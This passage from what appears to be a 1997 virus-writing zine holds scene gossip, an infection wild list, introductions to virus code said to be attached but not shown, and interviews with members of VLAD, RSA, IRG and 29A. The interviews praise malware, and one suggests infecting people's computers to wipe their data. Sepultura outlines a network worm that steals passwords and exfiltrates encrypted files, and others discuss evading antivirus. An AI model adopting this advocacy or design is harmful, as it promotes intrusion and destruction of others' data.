Furthermore, they write (which could be interesting in this zine ;)). "Klas consider a virus named One-Half to be among the most naughty one's he's ever seen. - At the occations I've seen a virus spread itself to many computers at one time, it's one-half, he says. "It's made hard to detect and has no bugs. It places itself on the "partition-sector" (direct-translation -tu) and slowly starts to encrypt the harddrive. When half of the hd is encrypted the message "Dis is one half. Press any key to continue" is displayed and at that time, also back-up's is encrypted. (Klas starts his sector-editor (which he wrote himself%!) and takes us a journey trough One Half and its functions.. w-o-w- ;)). (Now, he says we're all kids who seems to love computers, yet are trying to fuck them up and thereby are really hating them..)

.SE 10 top wild list
Junkie.1027 (boot/file) Form.a (bootvirus)

Antiexe (bootvirus) Beijing (bootvirus) AntiCMOS (bootvirus) Grangrave.1150 (filevirus (Burglar/H I wrote av against btw! - tu :)) One-Half (boot/file) WM.Concept (macro-virus) Empire Monkey (bootvirus) Ripper (bootvirus) Well.. In case you're interested!


Since I forgot to include this code in the VLAD april fool's edition, here follow [Push-Up] (v. early beta!) written ages and ages ago by someone who surely indeed will turn red-hot-chily-red when seeing this ;). The code is as unoptimized as can be ;) and there are labels and check's w/o corresponding code :-). Double-code inclusion is included for your own sake! You -should- be able to optimize this and feel like an asm-wiz! As shitty old tradition we supply you with un-finished viruses for you to modify and claim your very own creation!

Also, as we say in Sweden "a laugh extends your life", so... I guess you'll be like really old after looking closely into this one.

Anyways the basic thought for this virus was good since I consider a bs/mbr/com/exe semi-stealth virus an alright replicator. The virus should work, but I guess that's about it, probably not perfectly under all configurations and stuff.

Gimme more cheese please

This virus is *really really* old and is for me hysterical funny to look on. If the author of it who wrote it 93/1994 remembers it, please write me an email! (I hope/think/believe you don't mind it being included

here ;)). It lack some byte optimizing but the overall quality is though alright concerning the coding style. (Now, I can nag on this, when I recieved it I didn't understand anything and the author teased me like shit ;)). Well, it's a resident COM infector w/o any other functions or payloads, works really good on my machine.

Eugene K

Well, I'm a big fan of AVP and its grafical section of viruses so here follow a gfx payload which is a sort of "remake" of a fire effect. Finally Eugene did include (what he called) "Riot.ir8" (a virus with a gfx effect) and just to see if he will include the virus below too. The virus follow as hex-script below this very slow effect named GrayNuclearSky. Don't enjoy.

The LifeWire virus

About a 220 byte .exe overwriter ;) of EXE-files which F-prot doesn't detect due to unknown reasons. It has two activation routines, one grafical and one standard which itself claim to have some selfmodifying-code along with some nifty TSR routine. Of course that routine is a damn liar. The first one will blow the second of november any year from 1997 (RTM Worm day). The second one will 'go off' on random basis. This virus wasn't ment to be a serious virus, simple a demo-virus (haha) for the demoroutine above. Further more the text-strings
"[LiveWire GFX] " "Hiya, Robert.. !"

is visible in trojanized files.

Side-effects the conversation way

This was suppose to be a short summery of what good side effects viruswriting might have. I can't exactly say what you consider being a positive effect of something, but most stuff thought of is negative which of course leads us to a position where it's hard to motivate viruswriting. This mean that this is an important issue to deal with if some of your irl 'friends' all sudden start wondering why the fuck you're doing it and you have'll to defend your rights.

Well, you probably have thought about a few good reasons yourself, if you need reasons that is. I said I couldnt give any good reasons to viruswriting stated in the interview published above ;).. Hm, that is definitly to simplify it, but it's for a time a fun thing to do.

Fun? Is it fun to write something with evil intension? Is it fun to make a bomb? Well, bombs are interesting, but please don't compare those things. When I said "fun", I ment "interesting". Yes, it is interesting to program things. It's interesting to develop code with an unique capability - to self-replicate. It's interesting to meet other people similar yourself and it's interesting and fun to see other people solution and learn from them. The coding itself is just a must to be accepted by the people who I talk with. But why viruses? Well, do you find any other programs that has the same impact on users than viruses? It's fun to know much about something that not too many people know much about. So.. it's all about having respect then? No, it's not. I won't discuss this with most people, only with those who're concerned. Plus, I like having knowledge if some smartass need to be "taken care of", but since I dislike physical violence, I find my computer skills somewhat useful. So, then you distribute your code to people you dislike? No. I didn't say you did now did I? Defence is easy. Just bore them to death and voila, you'll win. The conversation above *was* boring and due to that, I won't write anymore on it. The conversation above wasn't about side-effects at all. Gotcha. As stated somewhere, stay tuned and it will be presented. Not here though. Ha-Ha.


Recently, I've seen a lot of zines/groups popping up and while some has faded away. Well, some say the scene is dying but I think not. Only the "good old virus groups" are. Rabid is dead (hehe!), P/S is, NuKE is RIP, YAM, TridenT, DY, VG and so on are (Not much of news, most people don't even know about some jam ;)) but! there's 'always' new groups coming up some who're really good.. and yea.. Immortal Riot is still around and will be for quite some time.. Don't expect a fade out!

The funny thing with virus-groups is that we do release a shitload of zines. A short summary of the scene-zines might be in order here (If I've forgotten one or two.. that is only because I'm tired, but since I dislike to sleep... deal with it)

What I heard P/S died and won't put out any more 40hex issues. Well, most 40hex zines did include things one still can look on and learn from so if you miss them, re-read and study an old one :).


It's sad Qark and Quantum gave the entire virus-thing up, but we'll see what Darkman (who have been outta it recently) can do with it. I miss them ;) seeing my name appear in the greetings to each issue (hehe!) and those games included. After metabolis gave up vlad they lost a little of their "personality". Qark was very good as organiser, too bad (for us) he got tired of it and desided to drop the entire thing. Good luck in life guys!

After our merge with Genesis we finally brought out an issue and in my opinion a very interesting issue, too. Beside the overall code-quality (maybe too high for most) it included a lot of other good non-coding material. Thanks are due to Dark Fiber for doing a lot of work for us! Also worth to mention is that Sepultura and Rajaat put a lot of effort in doing it as good as possible. I heard people complained and gave us negative feedback, yet I can't understand why. There isn't much news in IRG (what I know of anyways) issue#9 is under development and you can if you consider yourself worthy contribute to it. Expect to see a high quality issue!

Vlad-stylish group from Spain(?) I wish good luck in the future. Had some interesting things in issue #1 and we can always hope it remains stable and evolve.

Issue #1 isn't really worth bitching on here. But, it's a first issue and I won't bitch on newcomers. We all started somewhere...

Does contain a lot of complex & interesting stuff. Maybe better commented viruses would increase the "overall quality" though. From russia with love :).

DC is gone. Might have formed another group called RSA. Can be interesting to see what Wild Worker and co. can do with his crew (RSA). (I know he wasn't "pres" but he should be).

Good luck guys! I surely will enjoy reading this zine! It's quality (besides this article!) poeple expect from you. Hope there will be a issue #2! Actually, this zine is not a SVL's one, moreover, it is not a group mag at all. Aditionally, we would like to stay an intergroup zine :) ]

Has been dead for several years now, still there is some newbee's on irc asking for VCL2. Don't do that, it's annoying as hell and you'll most likely be kicked or banned two seconds after you pressed enter. So read my lips: NuKE is dead!

Seems to be an interesting group, including b0z0 and guys. They did contribute to Insane Reality #8 and Sailor Moon is an interesting virus.

Dunno if the spelling is correct or not ;). They should though write their stuff in english if they're around (haven't seen much lately though).

So.. there's actually a shitload of groups out there, producing code. Hang around long enough on irc #virus and you'll see them sometime.


There's so many people to greet really. I would like to thank everyone who have been there for me, on the irc, on email and on the phone. Further greets goes to anyone who won't take this contribution any seriously. I promised to include something and I try to keep my promises. ok? Thanks to all I ever have done a /msg to, and yea.. IRG guys.. keep it up!


The Unforgiven. - Main article writer. Well, that's it (if not specified somewhere else).

Goodbye's and cya somewhere.. somehow.

Vlad.Au. Keep on emailing me.

Quotation & Poetry

Just read my mind and find the complete guide to insanity. Should be trivial if you belong to the second foundation. Personally I dunno about what choice I would made. First, Second or Gaia.. Hm, tricky.

But.. who really want to make choices. That sucks. I just want it all :).


I will continue hanging on the irc, writing my stupid articles and just float around being what I've been. Really, I'm so satisfied what Sepultura has done for IRG so consider him in control. If you found this article chaotic. You're right that was the idea if I might add that. For IRG, the future is as bright as always. Download attached files here

Happy Valentine and 1997. The Unforgiven.

Interview with CoKe of VLAD

People, this interwiew is the only online interview in this issue. In all other cases i send to the ppl questions and just waited for the reply. If this interview sounds rather strange, nevermind, apologize it, I interviewed _CoKe_ in very unhealthy time. If I remember, it was about 6.30 am when we started. And in such a time, every normal european programmer sleeps... For some 1 or two hours...

Coke, try to introduce yourselves .... Hehe.. Well My handle is CoKe, comes from Coca Cola, not from cocaine.. :) It's my first and only handle. Good enough ? :) So, the next question, really difficult one: When did you start to do somethin' with computerz? Phew.. I was 10 or so when I got my first PC.. 8088 XT with Hercules graphics card... Since most of the games were CGA only I started to code in BasicA and GwBasic to write my own games... :) That makes 13 years now The coder was born.... but, in my humble opinion, the gamez and virii 're kinda different,or am I not right? Of course. But I wrote my first "virus" in QuickBasic 4.0 some years later... On execution it got the current EXE name from commandline, did a shell "dir >file.txt", opened that, and overwrote the EXE's in current directory with a copy of itself..heh Soundz like good start, but to go resident in HLL is right difficult task. So you have to switch to the right language - to the assembler... Yeah.. I was too limited in Basic, so after a while, I switched to C... And to make some small routines faster, I used a bit of assembler to speed things up... So your destiny was about become assebler xpert and viruz coderz after all the switching .... Yeah... I always found viruses quite fascinating.. Biological AND computer viruses.. So I grabbed some interrupt list (Not Ralphies), TASM, and started writing a non-ow com infector.. That actually took me 2 weeks of non-stop (night)work.. Another week later, I wrote a re mover for it, since

my friends playing and copying everything from my system got all infected.. hehe I know that situation. Non-ow com infectorz are good start for a coder, but you didn't stop at this level of code i know... And that nice story with remover ... Didn't you think of launching some kind of AV biz ? My first EXE infector was months later.. I first had to get Internet.. There I found an IR mag, called up their HQ, and got in touch with The Unforgiven and Metal Militia.. So I got more and more info, and got into work for my first EXE infector.. :) At that time I sent all my sources to Metal Militia, to discuss them over.. He was an idol at that time.. I thought about becoming AV for a time, but quickly realized that the AV was a commercial thingy, and directed by a few ppl. So I dropped the idea again... Especially after I got in touch with qark Qark is (was?) really very productive coder, and of course, VLAD member. And to code alone, without beeing in any group is not such a big fun.... Exactly.. >From the IR HQ I polled NukeNet, and posted some mails there... One day I had an email from qark inviting me to visit #virus, which I did.. He immediately put me on the Bot (LamerBot)... I coded some more stuff, and I gave one of them to VLAD because I wanted to join.. The votes were in my favour... fortunately.. :) hehe.. The funny thing is that the virus I gave them was buggy... But that's an old VLAD tradition.. hehe . [...I always use to say "It is not actually bug, but only some minor compactibility problem with hardware... :)"...] So you landed in VLAD. How was the feeling of beeing member of such elite bunch of geekz I was VERY surprised... Because I became a VLAD member some weeks after I applied for IR membership.. I got refused because I was nonSwede (No kiddin').. That depressed me alot.. :) Becoming a VLAD member was something I didn't even dare to dream about.. :) I remember the day when votes were finished, and Metabolis said on #virus : "CoKe is now a VLAD member"... Guess that was one of my happiest days.. :) And can you say, why is the true reason of vlad's dead ? First of all VLAD is _NOT_ dead... ??? all the people 're saying "VLAD is dead and issue #7 was goodbye issue... That's not correct. There will be a VLAD #8... 100%... That means ....??? Well it means there will be a VLAD #8... :)

And who is continuing in the tradition ? Darkman, me and [XXX] heheh... Qark and Quantum left VLAD because they were in the biz for too long I guess... hey both did a remarkable work, so I guess they earned that pause. :-) Let's back to the main topic, the viruses. What's your best virus, what's your most favourite virus ... And what virus ,in your opinion, was somewhat innovative in the last time ? I like all my viruses, and have absolutely no favourites.. Each virus is a mirror of my knowledge at that time, so I like them all.. I think my most innovative is Obscurum which is a COM/EXE stealth/res/poly that has got some neat tricks to hide.. And some really good viruses by other authorz ? I think the most impressive virus of all time is BIZATCH, not because it was done by a fellow VLAD member.. Bizatch kicked Bill's ass.. :) I agree, but all the AV humbug about naming it Boza was really disgusting. Yes. I still don't quite understand why that shit.. Probabaly some kinda revenge.. A really LOW level revenge.. BIZATCH has shown, that W95 is piece of shit, but actually, we all knew it for a long time. So now i wolud like to ask you about your planz for the future. As coder and of cos also in general... new OSes, new viruses, new trendz ... Yes.. I loved OS/2, but due to a lack of software, I almost HAD to switch to WIN95, just like thousands of other users... I hate Bill for that.. OS/2 was much better, and WIN95 only made it because of a HUGE publicity work by Mickeysoft.. My future.. Oh my... I'll do more viruses, and we'll try to get VLAD up again.. :) Microsoft, how can be something good, if it is produced by someone with small and not hard (e.g dick :)... btw, we have here such a club - M$haterz and ALT-F4 club I like that ALT-F4 club.. hehe where can I join ? :) Would you like to contribute to greetingz section and to fuck you section ? Greetings to Qark, Metabolis, MMIR, TUIR, Blonde/IR and Skeeve. Fuck them go to : All the lame irc-warriors.. Oh yeah .. and greetings to Sokrates aswell.. :) Okay , wish you good luck and good in yuor work. Thanks.. :) And don't forget.. VLAD is not dead... :) I'd be grateful if you could email your mag to me..

That was Coke exclusively for *zine, thanx for interview... and remember...

VLAD is still ALIVE!

Interview with Wild W0rker of RSA

Wild W0rker is one of the regulars on #virus. So I decided to ask him for an interview. Here I present the resulting textfile.

Can you introduce yourselves ? I am Wild W0rker, Ukrainian virus writer and RSA member born in the 1937 :). I have girlfriend (but may be she is my wife already, coz i don't know when this mag will be released :). Wildie is married man for some 2 or 3 week now :). Here you can see how lazy I am ... What is RSA? Ruthles Stealth Angels (RSA) that's Ukrainian virus writing group. BTW we need good coders:), if you are good coder and wanna be RSA member, email me to or Why did you choose nick Wild W0rker? Dunno:) I was drunk when i select it:) When and why did you start to be interestin' in computers ? I've seen the first time the computer 6 years ago at the school. It was the soviet computer and looked as a refrigerator:). I love refrigerators with products, that's why i love computers:) ( joke :) [ I know such a computerz :) ] Your first contact with virus ... When i start work with computers, one virus formated all my disks... That's was my first contact with viruses:) [ Hi boyz, who coded that Anti WW0 virus ? :) ] What about your first virus ? Heh, i made it one year, it was resident com infector. It was shitty virus you know what is first virus:) and i rm it. Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer) Well if you have problems with some ppls you don't need to use gun... You can infect their computers and destroy all information on it... may be


after that this ppls will use gun for suicide:) Your favourite virus and why Hmm i think Zhengxi is it, coz it can infect everything, have good polymorphic engine and many other nice features:) Your favourite antivirus program and why AVP, coz it have good polymorphism detection, not bad speed, xcellent virus descriptions. (and it can be fucked...look at 29A#1:) Vx coder you would like to meet personally and why I like to meet with all vx coders who can drink not only juice:) AV people you would like to meet i don't want to meet with AV ppls. AV name(s) making you to puke :-P no one:) Are in your country some laws against viruses and their authors? May be that's funny, but i don't know:) What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene ? they are idiots:) Your plans 4 the future as coder and in general... Well me and my friends (RSA members) will work on dos/win95 viruses and we trying to make undetectable virus... Last but not least : can you point us to some interestin' online resources on the internet ? - that's nice vx archive [ unfortunately, shortly after the zine was released, server of the Information Liberation Front went down and never reappeared. Another mysterious case of dissapearing server ... ]

So Wild W0rker, thanx for interwiew. And keep writing viruses . And don't worry 'bout being married :-P

Interview with Sepultura of IRG

So, in the line of this policy, I decided to interview one of the IRG leading personalities, Sepultura. Althought I had some technical problems in the time [ Sep knows :) ], here is the interview. Enjoy it !

Can you introduce yourselves ? Im Sepultura, born 1979, from Australia. Im a virus writer who is a member of IRG (Immortal Riot/Genesis) and do a lot of the organisation that go's into IRG's magazine Insane Reality. The only thing I like more then viruses is music (Sonic Youth, Front 242, Sepultura, and Beethoven are among my favourites). Actually I like copious amounts of buds and lsd more then viruses too. When and why did you start to be interestin' in computers ? I was never interesting ;) (so stop reading this interview). When I was 6 my mum bought us a Commodore64. I learnt BASIC and by time I was 7 I was very proud of this 'guess the number' game I made. I spent a few years playing with the C64, but as you can imagine I got quite bored with it soon. Then, when I was 12, some teacher let me muck around on the school's computers while the rest of my class was doing maths (since me and a friend already knew it.. infact all of IRG have IQ's over 200). Me and my friend made this game to test peoples multiplication tables and stuff, but the school never used it, as it flashed random insults and was quite abusive to the user if you got the answer wrong. This re-kindled my interest in computers and I nagged my mother who bought a 386dx in that same year. (This was the computer on which my virus writing started). Your first contact with virus ... For some reason I cant explain, I became very interested in viruses (aged 13, 1992). I didnt have a modem and knew no coders, so I had no idea what I should do. I met some lame fuck who told me viruses were written in C.. so I learnt C and after learning C still had no idea what to do (I didnt even know what a virus really does.. I just knew it replicates). Then I got vsum and it seemed to describe what viruses did in some detail but I had no idea what it meant (what the fuck is Interrupt 13h?? =)). Then I got FProt and somewhere in its documentation Fridrik Skulason mentioned any average Assembler coder could make a virus.. now I knew I shouldn't have learned C. Finally I gota book (this is late 1993) called 'Undocumented DOS' that told me about thing like Interrupts, segments, file I/O, and MCB's. It also had example programs written in ASM. I learnt

ASM by studying these programs and by playing around in DOS debug. At this stage I was ready to write a virus. Beetween here and when I had first become interested in virus's I had never actually seen or had contact with a virus. What about your first virus ? Well.. just after learning ASM (or DEBUG ASM more precisely) my friend got his machine infected with a virus called Slow (an encrypted 1721 byte Jerusal variant). I didnt have an assembler or disassembler (I didnt even know you could get disassemblers) so I studied the virus in Debug. I decided it was very badly coded, and wanted to make some changes, but I didn't even know how to change the length of the virus (so I had to modify it *and* keep it at 1721 bytes). The result was a semi-polymorphic virus with text strings and an actiation routine. That *could* be my first virus but it was only a hack. I didnt write a virus for a while because I didn't have an assembler, but finally I decided to write it in Debug. This involved writing the entire virus in Debugs (A)ssemble mode, printing out the (D)isasm listing, looking for errors, re-doing it over and over again until it worked. The first virus I did was Sepultura Boot.A which I spent an entire evening working in Debug on. Then some TSR .COM infector (I worked out how to go TSR by reading the doc's of an AV program called Stealth Bomber). Then my friend got a modem and I begged him to find me an assembler, which he did, and then I was free to write viruses as much as I wanted. You started as an independent coder, but after your massive support for Insane Reality #7 you landed in Immortal Riot. Tell us the whole story OK.. here comes more of my life story =) Mid '95 I got a modem and a carded OzEmail account. This is when I was first introduced to the virus scene. I met some guy called Qark, from VLAD magazine (which I read after FTP'n it with my schools inet account which I 'socially engineered' the password too). He was a nice guy and when I told him I was a virus coder he asked to see some code, which I showed him and he ended up sticking in VLAD#5. This is when I realised other people might actually care to see my code. So I coded more and gave it to The Unforgiven (TU from now on) for IR#7. It turns out I donated more then average and people were impressed. Late in December '95 I joined VLAD but this didnt last long. There was a new group called Genesis, but after leaving VLAD I didnt think I should ask for membership in it as it would look like I was group hopping. Februrary/March 1996, and TU told me IR was now an open group and I could join, so I asked if I could, and I did. Then (perhaps cos I nag too much) TU let me do a lot of organisation, and I ended up organising IR#8. And thats the whole story. Perspectives of polymorphism Traditional polymorphism (with a static virus wrapped in a highly variable decryptor) is a dying concept in my opinion. With the advent of generic

decryption, polymorphism is not really much of a threat to the scanners any more. I think the future lies in the 'metamorphic' viruses. These are viruses that are not encrypted, but the code of the virus itself changes. These include viruses such as PLY, Win.Apparition, TMC, and Swap. If we imagine metamorphism in the future reaching a stage where the only thing two copies of the 'same' virus have in common is the algorithm (or what actually they do). This can pose some interesting problems. Lots of 'different' viruses use exaclty the same algorithm, so if a virus that modifies its code comes out is it just creating a new copy of the same virus, or a new virus? And really, detecting a virus just by looking for code to perform a certain algorithm, is what is used for heuristic scanning today, so when detecting a truly metamorphic virus, you are likely to detect a lot of completely unrelated viruses - how can you identify such a virus? [ TMC hex dump can be found in this issue of our zine :P The source 'll be released only after all the major AV vendors 'll detect it. IMHO, they should have their job as hard as possible for their money :))))) Ed. ] Perspectives of stealth Stealth is a problem. Stealth stops the user noticing the virus, but to do stealth, you must be able to identify the virus and find the nescessary info in the virus body. This defeats the purpose of polymorphism. I think in the long run, good polymorphism is a better option. I don't like viruses that are to desperate to be 'stealthy' that they sacrafice compatibility, like DIR-2, Assasin, and No. of the Beast. Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer) The kind of viruses we deal with (80x86) are not much of a weapon in my opinion. But I think viruses could be used as a weapon. Imagine a multiplatform virus (perhaps a Unix Shell Scipt), that exploited many Unix (and Unix variants) security flaws, and spread over a TCP/IP network. This is very similar to what the Robert Morris internet worm did, but it would have to be updated for newer systems, and shouldnt replicate till the machine crashes. The virus could then perhaps act as a sniffer, monitoring Ethernet activity looking for logins/passwords to other systems, to continue its spread. Further more, the virus could even search through (for example) any file, looking for the phrase 'U.S. Intelligence', and if the phrase was found, compress the file and send it to some barely used public-FTP site or mail the file UUENCODED to some obscure USENET . Newsgroup, for the creator of the virus to download. Lastly, the virus could use a public key encryption system (such as RSA) - the virus would contain the public key, and encrypt the stolen (and compressed information with it, so that it could only be decrypted by the creator of the virus, and people would not realise these junk files on the FTP site or USENET group contain anything unusual. If this was done well, it could be quite an effective intelligence weapon. (And we at IRG have done it, thats

why we know everything about everyone). As an Australian dude, can you describe local virus scene ? The Australian virus scene is quite healthy. Lots of solo virus writers have come from Australia, such as the Gingerbread Man, aswell as quite a few members of NuKE, IRG, VLAD, and the AIH. As far as the international virusscene go's, I think Australia is quite prominent in it (Slovakia, Taiwain, ex-USSR, and Australia have all extended 'virus technology' quite a bit). On a more local level, the virus scene in my state is reasonably healthy too. Two IRG members live in this state, aswell as a few lesser know virus coders. There are also 5 BBS's that I know of in this state that carry Virus related file and/or mail areas. The same stuff as previous but AV As far as I know, Leprechaun Virus Buster, and Cybecs VET are the only two Australian AV programs. They both suck completely and are not even worth mentioning. Your favourite virus and why I dont have a single favourite virus. My favourite viruses include: Tremor, Havoc, N8FALL: Neurobasher was cool, if you consider the time at which his virus were written. It is almost like he made a list of all threats to viruses at the time, and then made viruses to adress these threats, 1 by 1. For example, the heuristic scanners (which were just coming out when he was around) detected suspicious date stamps, so he started using size padding instead, and modified his entire set of full-stealth routines to accomodat the variable size. In my opinion he is the king of retro-viruses - his were really the first ones to make strategic attacks on the AV programs. Level3, Onehalf: Vyvojars viruses caused many problems for the AV aswell. Lots of scanners still cant detect these two viruses reliably. TBAV is even stupid enough to claim you should clean Onehalf with FDISK /MBR ;). Level3's engine is very complex yet is very logically coded. Natas: Priests code is very clean and error free, which is sadly, something most viruses writers (including my self) lack. Phoenix, Commander Bomber, MtE: DAV's code is fucking crazy. Hardly anyone I know can even understand the structures used in his viruses (especially MtE and Bomber). He's also the 'number theory in viruses' king. TPVO: The TPVO viruses are excellent, strategic, and very cleanly coded. So are Dark Slayer's engines. Dark Slayer is one of the best currently active virus coders in my opinion. Level3 and DAME are both worth looking at just for their very sturdy and logical code.

[ Well, as for One_Half, check out its original source code in the mag. First time ever published stuff :-P Ed. ] Your favourite antivirus programm and why AVP would probably be the best over all program (it has excellent known virus detection and cure, CRC checking, good heuristics, and good decryption). F-Prot has good known virus detection/cure. Dr Web and DS-AVTK have very good emmulators. I do not know what methods ICE-NOD uses, but it is very good too. Suspicious.. I barely consider this an anti-virus program, its much more like a set of diagnostic tools. Apart from the fact that it doesnt have the best decryption, the reports its heuristic scanner SSC gives are very detailed. Often, when I recieve a new virus sample, instead of analysing it manually, I just run SSC over and read the result. I use AVP, AVG, DS-AVTK, ICE-NOD, F-PROT, TBSCAN, DR WEB, and SUSPICIOUS to test my viruses. Vx coder you would like to meet personally and why Just because someone is a good coder, I would not want to meet them having a technical discussion with them over the phone/IRC/mail is enough. I have met DV8 before (the guy who coded Mr Klunky) and he gave me beer, so I guess I wouldnt mind meeting him again. I also would like to meet any other virus writer that would give me beer. I'd like to meet basically all of IRG. AV people you would like to meet Stefan Kurtzhals, the coder of F/WIN and Suspicious is an excellent coder and has a lot of technical knowledge, but from the discussions I have had with him I think he's fucking crazy, so I wouldnt mind meeting him. Also, any AV person who will give me beer. Mikko Hyponnen/Eugene Kaspersky and occasionally Alan Solomon seem to make amusing jokes (and like beer). Sara Gordon/Vesselin Bontchev/Jim Bates, so I can spit in their eye (and steel their beer ofcourse). [ Sep loves beer :) , i can promise if I 'll ever meet him, he gets some beer from me ... But basically, he should fly to Europe .... As 4 Jim Bates ... He deserves much more than such a lenient treatment. We should try to use Magic Bullet (tm) ... Ed. ] Are there in Oz some laws against viruses and their author? There are no laws against writing viruses as far as I know. Spreading

them is a different story. Laws were made to be broken anyway. What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene ? I dont think about them. They don't matter, and they will never succeed. We can simply ignore them, and they will go away. (But others will come along to take their place, so we just keep ignoring the ignorant massess). Your plans 4 the future as coder and in general No idea. I'm currently looking at infection of the new executables (NE/LE/PE and LX) aswell as metamorphic viruses. Besides viruses I like playing with cryptography and computer security in general. Last but not least : can you point us to some interestin' online resources on the internet ? (IRG homepage) (Lots of Stuff) (Lots of Stuff) (Virus Encyclopoedia) (Virus Bulletin) (AV papers) (LOTS of AV Programs)

So thanks, Sep. Was very nice you spended some time with this interview. Not a problem, good luck with *-Zine. (Was I supposed to answer that??) [ Sure, what else ? :) Ed. ]

Interview with MrSandman of 29A

... known as Tarantino's film lover. As i wanted to gain some interviews for this issue i started with Sep. But due some problem with my mailer daemon, actually the first interview was this one. Lem'me introduce dude from Spain, who stayed some time in Romania. I guess, that the Romania episode was the reason why Mr. Sandman started to write viruses. Just for explanation. Romania borders on Bulgaria.... And Bulgaria.....

Can you introduce yourselves ? Well, we're just a group of friends who knew themselves in a BBS, started changing ideas and decided (me) to found a virus writing group and release a virus magazine. Most of us are studying a career at the university, other are in the military service, and the rest are studying at the school, very near to start a career. Your relationship to girl, beer and another lovely subjects Hehe... well, my relationship with my girlfriend is ok, we even travelled to India and live (sometimes) together in a flat of mine... we've been going out for more than a year :) About beer, i'm sorry, but i don't like it :) I don't like drinking, i only do it in very special circumstances. Other lovely subjects could be music, cinema, and, of course, computing and writing viruses. Anyway, i don't have many free time, as i have a lot of exams and a lot of unreplied BBS and Internet mail... i guess you know this situation :) When and why did you start to be interested in computers ? I had my first experience with a 8088 bought by my brother, when i was only 6 or 7. I didn't have any adaption process or shit like that, i just liked computers since the first time i knew them. Anyway, i must say that my first love was my first Macintosh :) Your first contact with virus ... It was some time after buying my first Mac, with a virus called WDEF with which there were some infected applications my brother brought from his work. Anyway, it was also an AV contact, as i did a disinfection work with an application called ResEdit (the equivalent in Mac OS for the debug.exe of DOS) :) Two years later, more or less, my PC got infected with the Traceback.3066 virus, and that's when i really got interested on viruses, albeit i could not do any 'serious' work until i got a modem and

downloaded more virus stuff (especially virus magazines) from spanish underground boards. What about your first virus ? Heh... well, there were some projects. The first virus i coded was a 30byte-more-or-less overwriting infector :) Later i wrote an appending nonresident COM infector, later i tried the EXE infection, SYS files, etc. And that's when i started combinating different kinds of infections and inventing some new original stuff. The boot/MBR thing came later, but that's something i never liked, dunno why... this is... i can write a boot/MBR infector in two minutes, but i don't like them at all; don't ask me the reason :) How did u land in 29A staff ? Well, actually i never landed... it was the rest of the people who did it :) We all used to interchange ideas and material via a spanish BBS called Dark Node; one day i realised that we had enough stuff to release a zine, and then i proposed it. Many people accepted, so we founded 29A and we started to work in order to release our first zine asap. Anyway, in 29A there's no staff, there's just a boss who takes decissions according to the opinion of the rest of the members, but there are no 'range' differences between us. Perspectives of polymorphism Polymorphism has some advantadges if we compare it with other viral techniques such as stealth, for instance. There's no any unique routine which mutates viruses, it's something very personal, more personal even than a virus itself. So it depends on the imagination of a virus author to write a powerful-supercomplex poly engine... anyway, right now we must focus the slow poly stuff, as it's the unique way to fuck AVers and make them worth of the money they earn. And this last thing depends on the point of view of each virus author; some of us bet for originality, other writers prefer to release their viruses and see how long do they stay in the wild... so there's no any unique answer. Perspectives of stealth Stealth is almost dead, it's the opposite thing to polymorphism. There are very few stealth techniques, as everybody uses the ones which already exist... they only vary a little if you mean full stealth, as it's something which takes a bit more of time. They work, so everybody uses them; they're very simple, so it's very difficult to write something really original and special on them. Anyway, Super (new 29A member!) has something to say about this ;) New systems (W95, NT OS/2 ) and viruses ...

Since Bill Gates is the wealthiest man in the earth right now, we must assume that Windows (and i don't mean Windows95 or NT) is the future. Heh, anybody could make all the people think that a crock of shit is good, and even eat it... if he has the money Bill Gates has :) Operating systems such as Linux, OS/2 and Mac OS are very good, but they will die soon as the number of dickheads increases every day. Of course, Windows95 won't be the definitive operating system... anyway, i think that it's a positive thing to spend our time trying to find out more stuff about PE infection under Windows95, as things won't change radically in a LOT of time. Today I got a message about first virus under Linux. What do you think about it Good news for the virus community, of course :) That's the second part of the future... 50% will be Windows-dickheaded users, and 50% will be Internet applications developers who will work under Linux/Unix with programming languages such as Java. Anyway, Linux is still a very 'rough' operating system which evolves with very slow but firm steps into a definitive consistent alternative. Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer) It'd be very difficult to write such a virus (if you're expecting a good success ratio), cause it'd have to be a slow infector... but not so slow, cause it'd then leave more time for people to discover it. It'd a good idea to copy itself into unusual places, either using the cavity infection method or the Pascal/C trick used by Zhengxi and Lucretia. There would be much more doubts about this, such as, for instance, wether to be small (the virus) but with a stupid encryption, or to be around 10k long, but encrypted with five highly polymorphic complex engines. As an Spanish dude, can you describe local virus scene ? There's no scene besides 29A in Spain... there are many underground boards, but almost all of them without any special relevance. The two most important underground BBSs in Spain are Dark Node and Edison's Temple. In both of them you can find a lot of virus writers, but most of them are members of 29A, or just write a common virus from time to time. It seems that hacking/phreacking is more popular here. In fact, Edison's Temple is a hacking-oriented BBS, just ask Mr. White or Wintermute, two of the most important persons there. The same stuff as previous but AV Some time ago there was an antivirus called Skudo, written by a dood from Barcelona called Jordi M=A0s. Anyway, it was designed for preventing against viruses, not for detecting/disinfecting them. As its


author left Barcelona and now lives in France, we didn't know anything else about Skudo. There are some other 'pure' AV packages, such as Artemis, Panda, Oyster, XScan, PC-Cillin, and so on, but they're just commercial shit (the typical ignorant dickheads who claim that their antivirus detects over 9000 viruses , you know...). Your favourite virus and why Errrhmm... never had anything clear on this. I think i'd choose Zhengxi as my favourite virus, as it's the most complex i've ever seen in my life, and there are still lots of unexplored (commented tho) things on it which can be used in other viruses. It's original, it uses a very insidious infection way, it's the most difficult virus to detect/disassemble, and its poly engine is *awesome*. Your favourite antivirus programm and why AVP, of course. It's the most professional (well, i'd even say it's the unique professional AV), very reliable, easy to use for lamers and very flexible for gurus, it's the one which detects/disinfects more viruses, and the unique AV which includes so necessary (and easy!) techniques such as disinfecting known viruses in memory. Its code analyzer is the best, and it's probably the most difficult AV to fool. Besides, i love AVPUtil and AVPRO, two utilities of its registered version :) Vx coder you would like to meet personally and why Dunno, this is probably the most difficult question. I think Qark, he's very funny, he's the virus writer i admire most, and i have a very good relationship with him; of course, i'd like to meet other people i admire a lot, such as Quantum, Stormbringer, Rajaat, Q the Misanthrope... who knows, there are a lot. All the 29Aers usually meet in Spain two or three times a year, and we ave a lot of fun, we even bring computers to our meetings, so we can execute/write viruses, and so on :) Of course, it would be very nice to do an european VX meeting, that would be da freak! ;) AV people you would like to meet I'd like to meet Kaspersky in order to discuss technical stuff... 